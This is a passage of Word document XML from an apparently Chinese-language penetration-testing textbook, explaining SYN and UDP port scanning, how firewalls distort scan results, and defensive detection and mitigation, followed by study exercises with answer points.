        <w:t xml:space="preserve">SYN_RECV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">超时条目），从而降低隐蔽性】。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">然而，这种隐蔽性并不是绝对的。不少入侵检测系统专门监控短时间内大量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包后跟随</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的模式，或者统计未完成的半连接数量。大型网络环境中，若防火墙处于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理模式，攻击者收到的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN-ACK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可能并非来自真实目标，而是由防火墙代答，导致扫描结果的“假阳性”——即端口被误判为开放。因此，在实际渗透测试中，SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描的结果需要与其他扫描方式交叉验证。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">扫描</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则完全脱离连接的概念。UDP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议是无连接、不可靠的，没有内置的确认机制。因此，向目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口发送一个数据包（通常为空数据或协议特定探针）后，扫描器只能通过两种反馈来推断端口状态：一是如果端口关闭，目标主机的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">栈通常会返回一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目的不可达（Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3, Code </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3）报文，即“端口不可达”；二是如果端口开放，很多服务在收到无法识别的载荷时不会给出任何回应，这导致攻击方无法区分“端口开放但服务静默”与“探测包被防火墙丢弃”。若长时间无响应，Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等工具通常将状态标记为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">open|filtered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，即可能开放也可能被过滤。这使得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描不仅速度极慢（需要等待超时），且结果高度不可靠。①【标准/通用原理：ICMP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口不可达响应由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RFC 792 / 1122 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规定，是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">层对不可达端口的标准错误报告】②【环境/版本相关：现代操作系统对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不可达报文的速率限制（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">icmp_ratelimit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）会严重影响扫描速度与可靠性；大量中间设备可能直接丢弃</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量而不回应任何</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ICMP，进一步加剧误判】。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描的慢，根源在于无状态和隐性丢包。TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描至少可以在收到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN-ACK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后立即做出判断，而</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">必须依赖超时重传，每一次重传都将等待时间倍增。对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1000 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口，即使超时设为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">秒，理论上最小耗时也远高于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描，实际扫描经常持续数十分钟。针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的防御也相对简单：在网络边界过滤不必要的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量，或在主机侧限制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不可达报文的发送速率，就能显著降低攻击者的枚举效率。然而，对于必须向公网暴露的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DNS 53、NTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">123），蓝队应优先确保这些服务仅允许必要来源访问，并通过监控异常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量模式来检测扫描行为。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防火墙与丢包扰动判定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：上述三种扫描的“理想网络假设”在实际环境中往往失效。防火墙可能静默丢弃去往关闭端口的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包（不发</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RST），导致</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描误判为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">filtered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">；也可能丢弃</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不可达，使</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描结果大面积</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">open|filtered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。状态检测防火墙可能对未完成的握手进行会话清除，但其行为因产品而异。本节仅建立简化模型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">③；更详细的规避与对抗留待后续章节。重要的是认识到，攻击者收到的任何回应都是“目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中间设备”的合谋产物，扫描的技艺在于最大限度地逼近真实端口状态，而防御的技艺则在于构造欺骗性或混淆性的反馈，使攻击者难以做出准确判断。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7920"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">防御对照框：检测与缓解端口扫描</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">检测</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">：蓝队应在网络边界部署</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">IDS/IPS（如</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Snort/Suricata），启用端口扫描特征规则（基于连接速率、端口覆盖度、SYN-RST</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">比例等度量）。主机侧可通过日志审计（如</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ss -tan</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">观察大量</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> SYN_RECV </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">状态条目、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/var/log/auth.log</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">中连续失败连接）或使用开源工具如</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">psad</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">PortSentry</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">进行实时告警。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">缓解</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">：</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">防火墙默认拒绝入站连接，仅开放必要服务端口；</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">对面向公网的</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> UDP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">端口进行白名单式过滤，降低</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> UDP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">扫描的反馈精度；</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">实施</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> SYN Cookie </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">机制或在负载均衡器上启用</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> SYN </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">代理，可吸收</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> SYN </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">泛洪攻击并模糊扫描反馈；</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">- </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">部署网络蜜罐（如</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Honeyd、Cowrie），在非服务端口上模拟响应，误导攻击者并消耗其时间窗口，同时记录其全部行为用于溯源。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">-</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">主动防御</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">：利用动态</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> IP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">跳变（如</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> MTD </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">技术）或端口敲门（Port</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">Knocking）隐藏真实开放端口，增加扫描难度。但需注意这些方法会带来运维复杂性，需与业务需求权衡。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（提取题）请用自己的语言解释为何</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描比</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP connect </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描更隐蔽，并列举至少一个可能导致</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描隐蔽性下降的现实因素。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提示：考虑握手完成度、日志记录点、中间设备代理行为。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">答案要点：SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描不完成三次握手，避免应用层日志及连接跟踪记录，但某些</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OS/IPDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会记录半连接，且</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理可产生误导。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1054"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（提取题）UDP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描为何速度慢且结果不可靠？请从协议无连接特性、ICMP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">响应机制以及中间设备行为三方面说明。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提示：UDP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无确认，依赖超时；ICMP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不可达可能被限速或过滤；开放端口可能不响应。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">答案要点：UDP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">必须等待超时重传，耗费时间；ICMP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">速率限制导致丢包；防火墙丢弃</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包造成假阳性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
